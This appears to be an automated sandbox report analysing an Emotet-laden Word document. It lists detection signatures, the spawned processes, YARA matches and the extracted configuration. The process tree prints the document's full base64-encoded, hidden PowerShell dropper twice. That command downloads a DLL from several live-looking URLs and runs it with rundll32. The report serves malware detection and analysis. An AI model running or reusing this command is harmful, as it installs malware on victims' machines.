Play interactive tour

Edit tour

Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name:	ARCH_25_012021.doc
Analysis ID:	344718
MD5:	baedc37e68b58765fa52c73d0fd2c2d5
SHA1:	2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256:	94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Obfuscated command line found

Potential dropper URLs found in powershell memory

Powershell drops PE file

Sigma detected: Suspicious Call by Ordinal

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2400 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2624 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 2544 cmdline: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2812 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2792 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2796 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2920 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3044 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2500 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.660000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.140000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.410000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.340000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
